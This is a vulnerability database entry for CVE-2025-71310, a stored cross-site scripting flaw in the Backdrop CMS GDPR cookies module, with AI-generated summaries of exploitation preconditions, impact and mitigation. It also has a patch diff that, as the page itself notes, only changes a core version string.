CVE-2025-71310
Description
The GDPR cookies module for Backdrop CMS (before
1.x-1.3.5) doesn't sufficiently protect visitors from Cross Site Scripting (XSS) if a malicious value has been provided for the optional 'Info content' field for the YouTube service. This is mitigated by the fact that an attacker must have a role with the permission "Create a GDPR Cookies Service" or "Edit any GDPR Cookies Service" and a site must have added a YouTube service as configuration.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
The GDPR Cookies module for Backdrop CMS before 1.x-1.3.5 has a stored XSS vulnerability via the 'Info content' field for the YouTube service, requiring privileged access.
Vulnerability
The GDPR Cookies module for Backdrop CMS, versions prior to 1.x-1.3.5, does not properly sanitize the optional 'Info content' field for the YouTube service. This allows an attacker to inject arbitrary JavaScript or HTML that will be executed when the field is rendered. The vulnerability is present only if the site has configured a YouTube service and the attacker has the 'Create a GDPR Cookies Service' or 'Edit any GDPR Cookies Service' permissions [1].
Exploitation
An attacker with the required permissions can edit or create a YouTube service and supply a malicious payload in the 'Info content' field. When a visitor views a page that displays the GDPR consent dialog or related content including this field, the payload executes in the visitor's browser. No user interaction beyond viewing the page is required [1].
Impact
Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of the victim's session. This can lead to data theft, session hijacking, defacement, or redirection to malicious sites. The severity is limited to Low because the attacker must have a privileged role and the site must have YouTube service configured [1].
Mitigation
Upgrade the GDPR Cookies module to version 1.x-1.3.5 or later, which contains the fix. The update is available from the module's project page [1]. No workarounds are documented. The vulnerability is not listed on the CISA Known Exploited Vulnerabilities (KEV) catalog as of the publication date.
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
1- Range: <1.3.5
Patches
196171b1c9eb2Backdrop 1.3.5
1 file changed · +1 −1
core/includes/bootstrap.inc+1 −1 modified@@ -7,7 +7,7 @@ /** * The current system version. */ -define('BACKDROP_VERSION', '1.3.x-dev'); +define('BACKDROP_VERSION', '1.3.5'); /** * Core API compatibility.
Vulnerability mechanics
Root cause
"Stored Cross-Site Scripting (XSS) because the optional 'Info content' field for the YouTube service is not sanitized before rendering."
Attack vector
An attacker with the "Create a GDPR Cookies Service" or "Edit any GDPR Cookies Service" permission stores a malicious JavaScript payload in the optional 'Info content' field of a YouTube service configuration. When a visitor loads a page that renders this field, the unsanitized payload executes in the visitor's browser. The attack requires the site to have added a YouTube service and the attacker to have the necessary administrative role.
Affected code
The advisory does not specify the exact file or function in the GDPR cookies module where the 'Info content' field is rendered without sanitization. The patch in the bundle [patch_id=2540046] only modifies core/includes/bootstrap.inc to update the version string and is unrelated to the module's code.
What the fix does
The provided patch [patch_id=2540046] only bumps the version constant from '1.3.x-dev' to '1.3.5' and does not contain any code change that addresses the XSS vulnerability. The advisory states that the fix is in version 1.x-1.3.5 of the GDPR cookies module, but the patch file in the bundle is for the Backdrop core repository, not the module itself. No functional fix is shown in the supplied patch.
Preconditions
- authAttacker must have a role with 'Create a GDPR Cookies Service' or 'Edit any GDPR Cookies Service' permission.
- configSite must have a YouTube service configured.
- inputAttacker provides a malicious JavaScript payload in the optional 'Info content' field.
Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1News mentions
0No linked articles in our index yet.